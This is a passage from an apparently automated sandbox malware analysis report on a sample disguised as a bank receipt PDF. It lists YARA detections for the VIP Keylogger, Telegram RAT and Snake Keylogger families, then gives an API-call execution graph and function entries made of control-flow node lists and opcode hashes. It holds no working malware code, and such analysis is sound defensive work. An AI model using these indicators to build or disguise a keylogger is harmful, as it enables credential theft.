                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:6.6%
                                                                                                                Total number of Nodes:91
                                                                                                                Total number of Limit Nodes:7
                                                                                                                execution_graph 35943 60c84c8 35944 60c8502 35943->35944 35945 60c857e 35944->35945 35946 60c8593 35944->35946 35951 60c80b8 35945->35951 35948 60c80b8 3 API calls 35946->35948 35950 60c85a2 35948->35950 35953 60c80c3 35951->35953 35952 60c8589 35953->35952 35956 60c8f88 35953->35956 35962 60c8f77 35953->35962 35957 60c8fa2 35956->35957 35968 60c8104 35956->35968 35959 60c8faf 35957->35959 35960 60c8fd8 CreateIconFromResourceEx 35957->35960 35959->35952 35961 60c9056 35960->35961 35961->35952 35963 60c8104 CreateIconFromResourceEx 35962->35963 35964 60c8fa2 35963->35964 35965 60c8faf 35964->35965 35966 60c8fd8 CreateIconFromResourceEx 35964->35966 35965->35952 35967 60c9056 35966->35967 35967->35952 35969 60c8fd8 CreateIconFromResourceEx 35968->35969 35970 60c9056 35969->35970 35970->35957 35981 2cc4668 35982 2cc4684 35981->35982 35983 2cc469f 35982->35983 35987 2cc4800 35982->35987 35992 2cc4224 35983->35992 35985 2cc46be 35988 2cc4825 35987->35988 35996 2cc4910 35988->35996 36000 2cc4901 35988->36000 35993 2cc422f 35992->35993 36008 2cc7bbc 35993->36008 35995 2cc7e7a 35995->35985 35998 2cc4937 35996->35998 35997 2cc4a14 35997->35997 35998->35997 36004 2cc4524 35998->36004 36001 2cc490f 36000->36001 36002 2cc4a14 36001->36002 36003 2cc4524 CreateActCtxA 36001->36003 36002->36002 36003->36002 36005 2cc5da0 CreateActCtxA 36004->36005 36007 2cc5e63 36005->36007 36009 2cc7bc7 36008->36009 36012 2cc7cbc 36009->36012 36011 2cc894d 36011->35995 36013 2cc7cc7 36012->36013 36016 2cc7cec 36013->36016 36015 2cc8a22 36015->36011 36017 2cc7cf7 36016->36017 36020 2cc7d1c 36017->36020 36019 2cc8b25 36019->36015 36021 2cc7d27 36020->36021 36026 2cc97c0 36021->36026 36023 2cc9dd1 36023->36019 36024 2cc9ba8 36024->36023 36031 2cce130 36024->36031 36027 2cc97cb 36026->36027 36028 2ccb022 36027->36028 36035 2ccb080 36027->36035 36039 2ccb072 36027->36039 36028->36024 36032 2cce151 36031->36032 36033 2cce175 36032->36033 36043 2cce6e8 36032->36043 36033->36023 36036 2ccb0c3 36035->36036 36037 2ccb0ce KiUserCallbackDispatcher 36036->36037 36038 2ccb0f8 36036->36038 36037->36038 36038->36028 36040 2ccb0c3 36039->36040 36041 2ccb0ce KiUserCallbackDispatcher 36040->36041 36042 2ccb0f8 36040->36042 36041->36042 36042->36028 36044 2cce6f5 36043->36044 36045 2cce72f 36044->36045 36047 2cce510 36044->36047 36045->36033 36049 2cce51b 36047->36049 36048 2ccf040 36049->36048 36051 2cce63c 36049->36051 36052 2cce647 36051->36052 36053 2cc7d1c 2 API calls 36052->36053 36054 2ccf0af 36053->36054 36054->36048 35971 2cce800 35972 2cce846 35971->35972 35975 2cce9e0 35972->35975 35978 2cce5d8 35975->35978 35979 2ccea48 DuplicateHandle 35978->35979 35980 2cce933 35979->35980 36055 2ccc760 36056 2ccc7a8 GetModuleHandleW 36055->36056 36057 2ccc7a2 36055->36057 36058 2ccc7d5 36056->36058 36057->36056 36059 60cbdb0 CloseHandle 36060 60cbe1f 36059->36060

                                                                                                                Executed Functions

                                                                                                                Function 060C80B8 Relevance: 6.9, Strings: 5, Instructions: 651COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 294 60c80b8-60c85e8 297 60c85ee-60c85f3 294->297 298 60c8acb-60c8b34 294->298 297->298 299 60c85f9-60c8616 297->299 306 60c8b3b-60c8bc3 298->306 305 60c861c-60c8620 299->305 299->306 307 60c862f-60c8633 305->307 308 60c8622-60c862c call 60c5878 305->308 351 60c8bce-60c8c4e 306->351 310 60c8635-60c863f call 60c5878 307->310 311 60c8642-60c8649 307->311 308->307 310->311 316 60c864f-60c867f 311->316 317 60c8764-60c8769 311->317 326 60c8e4e-60c8ece 316->326 330 60c8685-60c8758 call 60c80c8 * 2 316->330 319 60c876b-60c876f 317->319 320 60c8771-60c8776 317->320 319->320 323 60c8778-60c877c 319->323 324 60c8788-60c87b8 call 60c80d4 * 3 320->324 323->326 327 60c8782-60c8785 323->327 324->351 352 60c87be-60c87c1 324->352 349 60c8ed7-60c8ef4 326->349 350 60c8ed0-60c8ed6 326->350 327->324 330->317 361 60c875a 330->361 350->349 369 60c8c55-60c8cd7 351->369 352->351 354 60c87c7-60c87c9 352->354 354->351 355 60c87cf-60c8804 354->355 368 60c880a-60c8813 355->368 355->369 361->317 370 60c8819-60c8873 call 60c80d4 * 2 call 60c80e4 * 2 368->370 371 60c8976-60c897a 368->371 374 60c8cdf-60c8d61 369->374 418 60c8885 370->418 419 60c8875-60c887e 370->419 371->374 375 60c8980-60c8984 371->375 379 60c8d69-60c8d96 374->379 375->379 380 60c898a-60c8990 375->380 395 60c8d9d-60c8e1d 379->395 383 60c8994-60c89c9 380->383 384 60c8992 380->384 389 60c89d0-60c89d6 383->389 384->389 394 60c89dc-60c89e4 389->394 389->395 399 60c89eb-60c89ed 394->399 400 60c89e6-60c89ea 394->400 452 60c8e24-60c8e46 395->452 401 60c8a4f-60c8a55 399->401 402 60c89ef-60c8a13 399->402 400->399 411 60c8a74-60c8aa2 401->411 412 60c8a57-60c8a72 401->412 435 60c8a1c-60c8a20 402->435 436 60c8a15-60c8a1a 402->436 428 60c8aaa-60c8ab6 411->428 412->428 420 60c8889-60c888b 418->420 419->420 421 60c8880-60c8883 419->421 426 60c888d 420->426 427 60c8892-60c8896 420->427 421->420 426->427 433 60c8898-60c889f 427->433 434 60c88a4-60c88aa 427->434 451 60c8abc-60c8ac8 428->451 428->452 439 60c8941-60c8945 433->439 440 60c88ac-60c88b2 434->440 441 60c88b4-60c88b9 434->441 435->326 444 60c8a26-60c8a29 435->444 442 60c8a2c-60c8a3d 436->442 447 60c8964-60c8970 439->447 448 60c8947-60c8961 439->448 449 60c88bf-60c88c5 440->449 441->449 486 60c8a3f call 60c8f88 442->486 487 60c8a3f call 60c8f77 442->487 444->442 447->370 447->371 448->447 457 60c88cb-60c88d0 449->457 458 60c88c7-60c88c9 449->458 452->326 454 60c8a45-60c8a4d 454->428 462 60c88d2-60c88e4 457->462 458->462 463 60c88ee-60c88f3 462->463 464 60c88e6-60c88ec 462->464 469 60c88f9-60c8900 463->469 464->469 473 60c8906 469->473 474 60c8902-60c8904 469->474 477 60c890b-60c8916 473->477 474->477 478 60c8918-60c891b 477->478 479 60c893a 477->479 478->439 481 60c891d-60c8923 478->481 479->439 482 60c892a-60c8933 481->482 483 60c8925-60c8928 481->483 482->439 485 60c8935-60c8938 482->485 483->479 483->482 485->439 485->479 486->454 487->454
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Haq$Haq$Haq$Haq$Haq
                                                                                                                • API String ID: 0-1792267638
                                                                                                                • Opcode ID: b41459c70e7e7625ddc1273b899ed465644ea76071d8f8dc993d65134d8ca8ae
                                                                                                                • Instruction ID: 32d280cbacac8ee463124c2c7efa15c8b00380274ef855e3cefaca1ac2eb7e6d
                                                                                                                • Opcode Fuzzy Hash: b41459c70e7e7625ddc1273b899ed465644ea76071d8f8dc993d65134d8ca8ae
                                                                                                                • Instruction Fuzzy Hash: D3423B70E402188FDB94DFA9C89079EBFF2AF88310F14C56ED409AB395DA349D45CB95
                                                                                                                Function 02CC7D98 Relevance: 3.1, Strings: 2, Instructions: 581COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Pp]q$d
                                                                                                                • API String ID: 0-2482886756
                                                                                                                • Opcode ID: be616f0b9e5c7799db603cad75c02c6d3422ae9fd9c8b0499f77ff8ae08c7aee
                                                                                                                • Instruction ID: d361e5d93f97aaa6fc8bd613532915b4d9c698d74daba3f2b9072e730c454ec9
                                                                                                                • Opcode Fuzzy Hash: be616f0b9e5c7799db603cad75c02c6d3422ae9fd9c8b0499f77ff8ae08c7aee
                                                                                                                • Instruction Fuzzy Hash: 3862CF74A00229CFCB25DF68C994BD9BBB2FF89300F1086E9D549A7254DB71AE95CF40
                                                                                                                Function 02CC4224 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Pp]q$d
                                                                                                                • API String ID: 0-2482886756
                                                                                                                • Opcode ID: eea97bbd24c1d129db2b49add05582932d5660257f464e2d0feb6320fb788876
                                                                                                                • Instruction ID: e5dc2ebc88bed2818d0df3b63bca421542f3cf85b0d56f9182b7692bd26699e2
                                                                                                                • Opcode Fuzzy Hash: eea97bbd24c1d129db2b49add05582932d5660257f464e2d0feb6320fb788876
                                                                                                                • Instruction Fuzzy Hash: 6652BF74A00229CFCB25DF68C994AD9BBB2FF89300F1086E9D549A7254DB71AE95CF40
                                                                                                                Function 060CF3AA Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 847 60cf3aa-60cf423 852 60cf42a-60cf4d0 847->852 853 60cf425 847->853 860 60cf4d1 852->860 853->852 861 60cf4d8-60cf4f4 860->861 862 60cf4fd-60cf4fe 861->862 863 60cf4f6 861->863 869 60cf5f0-60cf660 862->869 863->860 863->862 864 60cf5cb-60cf5eb 863->864 865 60cf53b-60cf53f 863->865 866 60cf56b-60cf580 863->866 867 60cf585-60cf5a1 863->867 868 60cf5a6-60cf5ae call 60cfb58 863->868 863->869 870 60cf503-60cf539 863->870 864->861 871 60cf541-60cf550 865->871 872 60cf552-60cf559 865->872 866->861 867->861 874 60cf5b4-60cf5c6 868->874 883 60cf662 call 82706f4 869->883 884 60cf662 call 82706e1 869->884 885 60cf662 call 82705a0 869->885 886 60cf662 call 82705b0 869->886 887 60cf662 call 8270670 869->887 888 60cf662 call 8271260 869->888 889 60cf662 call 8271278 869->889 870->861 877 60cf560-60cf566 871->877 872->877 874->861 877->861 881 60cf668-60cf672 883->881 884->881 885->881 886->881 887->881 888->881 889->881
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q$Te]q
                                                                                                                • API String ID: 0-3320153681
                                                                                                                • Opcode ID: db590b146f3d63c44f88233d0c3003e4ed4611508c3da72eeaf156f379d2a20c
                                                                                                                • Instruction ID: 3e8003424ff19113b6a9c196a259e1bbe5e462eabd18a09f1eb7ec988e836a39
                                                                                                                • Opcode Fuzzy Hash: db590b146f3d63c44f88233d0c3003e4ed4611508c3da72eeaf156f379d2a20c
                                                                                                                • Instruction Fuzzy Hash: 06911574E00219DFDB48CFA9D984AEEFBB2FF89310F14912AD905AB354D7309946CB51
                                                                                                                Function 060CF3CF Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 890 60cf3cf-60cf423 894 60cf42a-60cf4d0 890->894 895 60cf425 890->895 902 60cf4d1 894->902 895->894 903 60cf4d8-60cf4f4 902->903 904 60cf4fd-60cf4fe 903->904 905 60cf4f6 903->905 911 60cf5f0-60cf660 904->911 905->902 905->904 906 60cf5cb-60cf5eb 905->906 907 60cf53b-60cf53f 905->907 908 60cf56b-60cf580 905->908 909 60cf585-60cf5a1 905->909 910 60cf5a6-60cf5ae call 60cfb58 905->910 905->911 912 60cf503-60cf539 905->912 906->903 913 60cf541-60cf550 907->913 914 60cf552-60cf559 907->914 908->903 909->903 916 60cf5b4-60cf5c6 910->916 925 60cf662 call 82706f4 911->925 926 60cf662 call 82706e1 911->926 927 60cf662 call 82705a0 911->927 928 60cf662 call 82705b0 911->928 929 60cf662 call 8270670 911->929 930 60cf662 call 8271260 911->930 931 60cf662 call 8271278 911->931 912->903 919 60cf560-60cf566 913->919 914->919 916->903 919->903 923 60cf668-60cf672 925->923 926->923 927->923 928->923 929->923 930->923 931->923
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q$Te]q
                                                                                                                • API String ID: 0-3320153681
                                                                                                                • Opcode ID: 5490c35ec81076c37a8031cfce09f3b0b382dc95482ca7ac039ce8f0c28dbc7f
                                                                                                                • Instruction ID: fbdd989f0ec98e591089add6ac356c6e2c5dffc0a87b7c0c22051d64e9086365
                                                                                                                • Opcode Fuzzy Hash: 5490c35ec81076c37a8031cfce09f3b0b382dc95482ca7ac039ce8f0c28dbc7f
                                                                                                                • Instruction Fuzzy Hash: 97810474E01219DFDB48CFA9C984AEEFBB2FF89310F24812AD815AB354D7349945CB51
                                                                                                                Function 060CF3E6 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 932 60cf3e6-60cf423 934 60cf42a-60cf4d0 932->934 935 60cf425 932->935 942 60cf4d1 934->942 935->934 943 60cf4d8-60cf4f4 942->943 944 60cf4fd-60cf4fe 943->944 945 60cf4f6 943->945 951 60cf5f0-60cf660 944->951 945->942 945->944 946 60cf5cb-60cf5eb 945->946 947 60cf53b-60cf53f 945->947 948 60cf56b-60cf580 945->948 949 60cf585-60cf5a1 945->949 950 60cf5a6-60cf5ae call 60cfb58 945->950 945->951 952 60cf503-60cf539 945->952 946->943 953 60cf541-60cf550 947->953 954 60cf552-60cf559 947->954 948->943 949->943 956 60cf5b4-60cf5c6 950->956 965 60cf662 call 82706f4 951->965 966 60cf662 call 82706e1 951->966 967 60cf662 call 82705a0 951->967 968 60cf662 call 82705b0 951->968 969 60cf662 call 8270670 951->969 970 60cf662 call 8271260 951->970 971 60cf662 call 8271278 951->971 952->943 959 60cf560-60cf566 953->959 954->959 956->943 959->943 963 60cf668-60cf672 965->963 966->963 967->963 968->963 969->963 970->963 971->963
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q$Te]q
                                                                                                                • API String ID: 0-3320153681
                                                                                                                • Opcode ID: 5af96f3164e4662d0acadf39cbeae3d46d00728e484afcfdf802770ef30f746e
                                                                                                                • Instruction ID: 66152ef534e053d3dbda30f9115b1b84de00fc38b1ebf1fbc08f62eaef7f4517
                                                                                                                • Opcode Fuzzy Hash: 5af96f3164e4662d0acadf39cbeae3d46d00728e484afcfdf802770ef30f746e
                                                                                                                • Instruction Fuzzy Hash: 3F81F274E006199FDB48CFE9C984AEEFBB2FF89310F24812AD815AB364D7349945CB50
                                                                                                                Function 060CF400 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 972 60cf400-60cf423 973 60cf42a-60cf4d0 972->973 974 60cf425 972->974 981 60cf4d1 973->981 974->973 982 60cf4d8-60cf4f4 981->982 983 60cf4fd-60cf4fe 982->983 984 60cf4f6 982->984 990 60cf5f0-60cf660 983->990 984->981 984->983 985 60cf5cb-60cf5eb 984->985 986 60cf53b-60cf53f 984->986 987 60cf56b-60cf580 984->987 988 60cf585-60cf5a1 984->988 989 60cf5a6-60cf5ae call 60cfb58 984->989 984->990 991 60cf503-60cf539 984->991 985->982 992 60cf541-60cf550 986->992 993 60cf552-60cf559 986->993 987->982 988->982 995 60cf5b4-60cf5c6 989->995 1004 60cf662 call 82706f4 990->1004 1005 60cf662 call 82706e1 990->1005 1006 60cf662 call 82705a0 990->1006 1007 60cf662 call 82705b0 990->1007 1008 60cf662 call 8270670 990->1008 1009 60cf662 call 8271260 990->1009 1010 60cf662 call 8271278 990->1010 991->982 998 60cf560-60cf566 992->998 993->998 995->982 998->982 1002 60cf668-60cf672 1004->1002 1005->1002 1006->1002 1007->1002 1008->1002 1009->1002 1010->1002
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q$Te]q
                                                                                                                • API String ID: 0-3320153681
                                                                                                                • Opcode ID: 54ac85438f58cfdd3fa6e3eb884a517cfb07f86ee7ce900818739db1394d0eea
                                                                                                                • Instruction ID: 02a468f36e1630f3971fbcd4bd346ed12eb4bf9b98351a60769c5980b759fcef
                                                                                                                • Opcode Fuzzy Hash: 54ac85438f58cfdd3fa6e3eb884a517cfb07f86ee7ce900818739db1394d0eea
                                                                                                                • Instruction Fuzzy Hash: 2181C374E006198FDB48CFE9C984AEEFBB2FF89310F24852AD915AB354D7345945CB50
                                                                                                                Function 0827407B Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5{
                                                                                                                • API String ID: 0-2291050889
                                                                                                                • Opcode ID: f078d81113778c9327c44d08ecb24038d6dbe46ade0ba49a029770772320bde0
                                                                                                                • Instruction ID: 734e2f6c6dc2cf61a1c322386aa29fa9ac3aa58afb304e67c06b6de04574a8f4
                                                                                                                • Opcode Fuzzy Hash: f078d81113778c9327c44d08ecb24038d6dbe46ade0ba49a029770772320bde0
                                                                                                                • Instruction Fuzzy Hash: A6B15A74E11209DFCB08EFA9D6448AEFBB2FF88311F10946AD805AB364DB349951CF65
                                                                                                                Function 08274088 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5{
                                                                                                                • API String ID: 0-2291050889
                                                                                                                • Opcode ID: 7ede8bb938f69fbf12b2b0efa3efa6405e2bad8ad854545027024e7beb6ef409
                                                                                                                • Instruction ID: 3d8134e85b83941221042b2f55a4ceb6e2e27c009b099f041a5066e84e91393f
                                                                                                                • Opcode Fuzzy Hash: 7ede8bb938f69fbf12b2b0efa3efa6405e2bad8ad854545027024e7beb6ef409
                                                                                                                • Instruction Fuzzy Hash: 6FA14974E11209DFCB08EFA9D6848AEFBB2FF88311F109469D805AB364DB349951CF65
                                                                                                                Function 08275B30 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: j4$y
                                                                                                                • API String ID: 0-2391584009
                                                                                                                • Opcode ID: 1f843628293935764c9767499059ea24911770917ffabd2e7336d00dd81bc6c2
                                                                                                                • Instruction ID: baab3bdde0641e9cfbb7a39f729087ecd7be1b36d5ff90e6f799b144e7a96c97
                                                                                                                • Opcode Fuzzy Hash: 1f843628293935764c9767499059ea24911770917ffabd2e7336d00dd81bc6c2
                                                                                                                • Instruction Fuzzy Hash: A2812BB0D65209DFCB08CFE6D5808AEFBB2FF89311F10942AE515AB268D7749942CF44
                                                                                                                Function 08275B23 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: j4$y
                                                                                                                • API String ID: 0-2391584009
                                                                                                                • Opcode ID: a53ddfae18748767fa542fdb37eef8616d77dd1f07572b3db476de57a046a3d4
                                                                                                                • Instruction ID: cd617005ed194f0639126dee05ebfcf91d24dd37506675cc5ebd2e31704ab9e5
                                                                                                                • Opcode Fuzzy Hash: a53ddfae18748767fa542fdb37eef8616d77dd1f07572b3db476de57a046a3d4
                                                                                                                • Instruction Fuzzy Hash: BC812C71D65209DFCB08CFA6D5809EEFBB2FF89311F10942AE515AB268D7749946CF00
                                                                                                                Function 060C85B3 Relevance: .3, Instructions: 278COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62ee6ce49dd6c1e7717262fb31302693aa9da11d0e8bab44f10e9a32f843ab11
                                                                                                                • Instruction ID: 28d09a774e6b1ebb04bb1e3697aed286e0b0d3f84c1664f78dd46ba9c30c1db1
                                                                                                                • Opcode Fuzzy Hash: 62ee6ce49dd6c1e7717262fb31302693aa9da11d0e8bab44f10e9a32f843ab11
                                                                                                                • Instruction Fuzzy Hash: 3BC13A30E402199FDF95CFA5C88079EBFF2AF84320F14C56AD419AB255EB309985CF55
                                                                                                                Function 082744B8 Relevance: .2, Instructions: 161COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6f145a4f13ffc7bc6ec506c32b4020683b8afef4191a8a34088b9c61b78632cb
                                                                                                                • Instruction ID: 68dc4086ea481f900356f91d0cc7661c9740a49c4069466d4a5ce7e3b42ce764
                                                                                                                • Opcode Fuzzy Hash: 6f145a4f13ffc7bc6ec506c32b4020683b8afef4191a8a34088b9c61b78632cb
                                                                                                                • Instruction Fuzzy Hash: 85512970E25209DFCB08DFA6D4454AEFFB2FB89311F10992AE415E7254DB748A01CF58
                                                                                                                Function 082744C8 Relevance: .2, Instructions: 152COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 79570df9aa8789e1b0e4c8726fd294062adc2302205e29989b1d52e7437c9eb1
                                                                                                                • Instruction ID: 54d0688daa9fba97ae15b1a2d4869fe98f0907303ae6b213b2b0ce48e3aa22a0
                                                                                                                • Opcode Fuzzy Hash: 79570df9aa8789e1b0e4c8726fd294062adc2302205e29989b1d52e7437c9eb1
                                                                                                                • Instruction Fuzzy Hash: 9A512770E21209DFCB08DFA6D9454AEFFB2FB89311F10992AE415E7254DB749A00CF58
                                                                                                                Function 060CFB58 Relevance: .1, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d50cf9f2a2617f096b8cc3440b89930c136af4bd6a058daefeb4e2652285b9da
                                                                                                                • Instruction ID: 3fa658b4f5531a6379f7f0fb6f731d5fdc76bdb8656849447340d84d583af095
                                                                                                                • Opcode Fuzzy Hash: d50cf9f2a2617f096b8cc3440b89930c136af4bd6a058daefeb4e2652285b9da
                                                                                                                • Instruction Fuzzy Hash: D85136B4E0520A8FDB48CFAAD5806AEFFF2EF88310F14C06AD819A7255D7344941CFA5
                                                                                                                Function 082705B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2db17011101f4fc2375be2b0861951e8067e26a99be6ea434ecadd7a4d371699
                                                                                                                • Instruction ID: 81bf7d4479eb806ca69e112433e7a6442d22dae5fb407753204d664253321986
                                                                                                                • Opcode Fuzzy Hash: 2db17011101f4fc2375be2b0861951e8067e26a99be6ea434ecadd7a4d371699
